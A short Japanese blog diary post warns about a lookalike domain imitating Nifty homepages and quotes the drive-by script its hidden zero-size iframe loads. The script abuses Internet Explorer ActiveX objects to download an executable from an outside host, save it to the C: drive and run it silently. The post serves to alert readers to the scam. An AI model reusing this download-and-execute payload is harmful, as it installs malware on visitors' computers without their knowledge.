hylomの日記: 「www.homepage3-nifty.com」という、niftyに偽装したサイトが登場 1
タイトル通り。
「www.homepage3-nifty.com」と、URLだけみるとぱっと見nifty内にあるサイトっぽいけど、実はよく見ると分かるとおりnifty内ではなく、中国のサイトにつながるようで。
で、このサイト上にあるページには幅0、高さ0のインラインフレームに以下のようなスクリプトを仕込んだページを表示させる、と。
よく考えるよなぁ。確かにこのURLだとダマされる人が出てくるかも。
function do1(mx,as,p)
{
mx.Send();
as.Type = 1;
as.Open();
as.Write(mx.responseBody);
as.SaveToFile(p,2);
as.Close();
}
var a = null;
var mx,as,p;
p = "C:\\pageflies2.exe"
a = (document.createElement("object"));
a.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
try{mx = a.CreateObject("Microsoft.XMLHTTP","");}catch(e){};
if(!mx)try{mx = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){};
try{as = a.CreateObject("Adodb.Stream","");}catch(e){};
if(as){
mx.Open("GET","http://www.game-oekakibbs.com/bbs/server.exe",0);
do1(mx,as,p);
var r;
try{r = a.CreateObject("Shell.Application","");}catch(e){};
if(r)
{
r.ShellExecute(p,"","","open",0);
}else
{
try{r = a.CreateObject("WScript.Shell","");}catch(e){};
if(r)r.Run(p,0);
}
}
参考 (スコア:0)
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1164984508/
リネージュ資料室
http://lineage.nyx.bne.jp/misc/security/